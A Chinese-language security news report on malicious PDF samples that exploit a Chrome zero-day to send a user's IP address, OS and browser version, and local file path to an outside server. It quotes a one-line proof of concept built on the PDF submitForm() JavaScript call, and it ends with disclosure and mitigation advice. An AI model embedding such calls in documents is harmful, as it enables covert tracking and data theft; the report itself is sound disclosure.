概述
漏洞检查服务公司EdgeSpot发现,攻击者利用Google Chrome 0 day漏洞可以追踪用户/收集用户数据。
事件详情
根据外媒报道,从去年12月开始,EdgeSpot公司研究人员陆续发现一些利用Google Chrome 0 day漏洞的恶意PDF样本。当用户使用本地Google Chrome打开这些恶意PDF样本会产生一些可疑的流量。
以下为一个恶意PDF样本分析:
该恶意PDF样本被标记为POTENTIAL ZERO-DAY ATTACK (Google Chrome), PERSONAL INFORMATION LEAKAGE,
当用户使用本地Google Chrome打开之后,通过在后台抓取流量,研究人员发现了一些数据在没有用户交互的情况下被发送给域名readnotify.com,也就是说这些数据在没有用户授权的情况下被窃取了。
用户查看PDF文件时,该PDF实际上是在与C2服务器进行通信。根据HTTP包的信息,被收集和发送的用户信息包括:
ü 用户的公网IP地址
ü OS和Chrome版本等
ü PDF文件在用户电脑中的完整路径
事件后续
近期,研究人员又发现一些更多的恶意PDF样本。之前样本不同的是,新样本:
ü 影响的是Google Chrome(作为本地PDF阅读器),而不是Adobe Reader。
ü 不允许窃取NTLM,但是会泄露操作系统信息和文件保存的路径。
研究人员分析样本发现在stream-1中有可疑的JS代码。反混淆代码后,研究人员发现根源在于"this.submitForm()" PDF Javascript API。研究人员开发了一个PoC,像this.submitForm('http://google.com/test')这样的一个简单的API调用就会使Google Chrome发送个人信息到google.com。研究人员已经与Google取得联系,确认了0 day漏洞的详细情况,Chrome团队称该漏洞会在4月底进行更新和修复。研究人员建议相关用户在Chrome修复该漏洞前不要使用Chrome查看本地PDF文件,如果只能使用Chrome,那么查看的时候可疑断开网络连接。
